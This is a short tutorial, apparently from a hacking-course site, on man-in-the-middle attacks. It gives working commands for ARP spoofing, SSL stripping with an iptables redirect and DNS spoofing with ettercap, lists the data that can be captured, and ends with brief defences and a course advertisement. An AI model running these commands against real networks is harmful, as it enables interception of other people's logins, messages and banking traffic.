Man-in-the-Middle Attacks — Intercept Any Communication

Anuj Singh (Admin) 31 March 2026 1977 views

Man-in-the-Middle (MITM) Attacks

In a MITM attack, the attacker positions themselves between the victim and the server, intercepting all communication.

ARP Spoofing

# Using arpspoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t victim_ip gateway_ip
arpspoof -i eth0 -t gateway_ip victim_ip

Now ALL traffic from the victim flows through the attacker's machine.

SSL Stripping

# Using sslstrip
sslstrip -l 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Downgrades HTTPS to HTTP — victim thinks they're secure but they're not.

DNS Spoofing

# Modify /etc/ettercap/etter.dns
google.com A attacker_ip
*.google.com A attacker_ip

# Run ettercap
ettercap -T -q -i eth0 -M arp:remote /victim_ip// /gateway_ip// -P dns_spoof

What Can Be Intercepted

🔴 Login credentials (HTTP sites)
🔴 Email content
🔴 Chat messages (unencrypted)
🔴 File transfers
🔴 Banking transactions (if SSL stripped)

Protection

🔒 Use HTTPS everywhere
🔒 VPN on public networks
🔒 HSTS preload list
🔒 Certificate pinning in apps

🔥 Learn MITM attacks & defense at ONLY4YOU →

Want to Learn This Practically?

Subscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!

Continue Learning

← All Articles Browse Courses About ONLY4YOU